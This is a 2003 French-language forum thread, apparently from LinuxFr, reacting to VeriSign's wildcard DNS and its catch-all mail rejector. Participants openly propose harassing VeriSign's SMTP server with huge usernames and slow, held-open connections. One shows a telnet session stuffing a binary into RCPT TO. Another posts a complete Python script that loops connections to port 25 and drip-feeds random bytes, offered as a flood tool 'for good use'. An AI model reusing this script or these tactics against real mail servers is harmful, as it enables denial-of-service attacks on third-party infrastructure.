Re: VeriSign détruit l'un des fondements d'Internet

• [^]Re: VeriSign détruit l'un des fondements d'Internet

  Posté par ramzez () le 16/09/2003 à 20:19. (lien). Évalué à 2.

  il ne récupère pas le contenu du mail, tu vas t'emmerder pour rien
  il récupére juste ton adresse email (enfin c'est le bruit qui court
  d'ailleurs ils ont fermé le port 80 et pas le 25 donc j'imagine qu'il y a une raison à ça !!

  [^]Re: VeriSign détruit l'un des fondements d'Internet

  Posté par Mathieu LESNIAK (page perso, ) le 16/09/2003 à 20:20. (lien). Évalué à 1.

  passera pas....
  leur serveur mail renvoie un code 550 "User domain does not exist"", quelque soit le destinataire.

  • [+] [^]

    Posté par Francois Revol (page perso, ) le 16/09/2003 à 21:01. (lien). Évalué à -1.

    par contre je me demande s'ils sont pas en openrelay.

    [^]Re: VeriSign détruit l'un des fondements d'Internet

    Posté par _alex () le 16/09/2003 à 21:12. (lien). Évalué à 6.

    euh ça marche avec un username de 600Mo ?

    • [^]Re: VeriSign détruit l'un des fondements d'Internet

      Posté par vincent LECOQ (Jabber id, page perso, ) le 17/09/2003 à 09:17. (lien). Évalué à 1.

      ça il faut que j'essaye par-contre ...

      --
      Ma signature ici

      • [^]Re: VeriSign détruit l'un des fondements d'Internet

        Posté par Boa Treize (page perso, ) le 17/09/2003 à 13:53. (lien). Évalué à 2.

        Un truc simple qui peut bien faire chier, c'est tout simplement d'ouvrir la connexion et de la laisser ouverte le plus longtemps possible, soit en ne faisant rien soit en expédiant les donnée ultra-lentement.

      [^]Re: VeriSign détruit l'un des fondements d'Internet

      Posté par Keos () le 17/09/2003 à 10:35. (lien). Évalué à 2.

      Lol, je crois pas que la rfc permette un username si gros....faudrais verifier....
      Mais bon si c'était le cas ( ca m'etonerais enormement) vos FAI ainsi que vos prestataires de service mail ( souvent les memes) vont sacrément faire la gueule ;)

      • [^]Re: VeriSign détruit l'un des fondements d'Internet

        Posté par Gruik Man () le 17/09/2003 à 10:49. (lien). Évalué à 1.

        Suffit d'utiliser un mailer sur sa machine, sans smarthost (ou une connexion directe sur le SMTP de chez Verisign, ça revient au même)

        • [^]Re: VeriSign détruit l'un des fondements d'Internet

          Posté par Keos () le 17/09/2003 à 10:54. (lien). Évalué à 2.

          Je dirais meme plus...
          un mailer "sauce perso" qui accepte un tel username

          • [^]Re: VeriSign détruit l'un des fondements d'Internet

            Posté par B. franck () le 17/09/2003 à 14:17. (lien). Évalué à 1.

            je crois que certains ont déjà essaye' depuis longtemps:
            
            
            test]$ telnet 64.94.110.11 25
            Trying 64.94.110.11...
            Connected to 64.94.110.11.
            Escape character is '^]'.
            220 snubby4-wceast Snubby Mail Rejector Daemon v1.3 ready
            helo scrubby
            250 OK
            you suck
            250 OK
            mail from: tamere_en_short_a_magalouf.verisign.com
            550 User domain does not exist.
            mail from: tamere_en_short@magalouf.verisign.com
            250 OK
            rcpt to:^?ELF^A^A^A^@^@^@ ....
            ...
            ...
            ....^D^@^@.^C^@^@¬^B
            221 snubby1-wceast Snubby Mail Rejector Daemon v1.3 closing transmission channel
            Connection closed by foreign host.
            
            
            
            ps: oui oui c'est bien le binaire de bash que vous avez reconnu. ;)

        [^]Re: VeriSign détruit l'un des fondements d'Internet

        Posté par Olivier (page perso, ) le 17/09/2003 à 13:37. (lien). Évalué à 1.

        C'est pas grave, tu contactes direcement le serveur de mail de VeriSign, sans passer par un intermediaire...
        
        Au pire, tu fais un telnet sur son port 25 !!!

        • [^]Re: VeriSign détruit l'un des fondements d'Internet

          Posté par xael (page perso, ) le 18/09/2003 à 21:13. (lien). Évalué à 1.

          Application en Python pour innonder leur mailer daemon.

          #!/usr/bin/python
          import socket, random, time
          
          
          random.seed()
          
          while 1:
              s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
              print "Connect to verisign.verisign_fuck.com:25"
              s.connect(("verisign.verisign_fuck.com", 25))
          
              s.send("helo sucker\n"
                     +"mail from: motherfucker@verisign.com\n"
                     +"mail from: motherfucker@verisign.com\n"
                     +"mail from: motherfucker@verisign.com\n"
                     +"rcpt to: ")
          
              count=0
              ok=1
              while ok==1:
                  try:
                      s.send(random.choice(['a','b','c','d','e','f','g','h',
                                            'i','j','k','l','m','n','o','p',
                                            'q','r','s','t','u','v','w','x',
                                            'y','z']))
                      count=count+1
                  except:
                      ok=0
                      print "Disconnected -",count, "bytes flooded"
          
                  # do not charge *our* network too much
                  time.sleep(10)
          
              s.close()
          

          Source : http://www.bidules.org/flood.py(...) Evidement, c'est en GPL ;-) Bonne utilisation ;-)

          [^]Re: VeriSign détruit l'un des fondements d'Internet

          Posté par Alain Tésio (page perso, ) le 19/09/2003 à 20:53. (lien). Évalué à 2.

          Essaies "dig totoilestpascontent.com mx" et tu verras qu'il n'y a pas de champ MX pour un domaine inconnu, donc les mails vers des domaines inconnus ne devraient jamais arriver chez verisign.

          • [^]Re: VeriSign détruit l'un des fondements d'Internet

            Posté par Boa Treize (page perso, ) le 10/10/2003 à 13:22. (lien). Évalué à 1.

            Pas de champ MX, donc le mailer va utiliser le champ A, et hop, chez Verisign !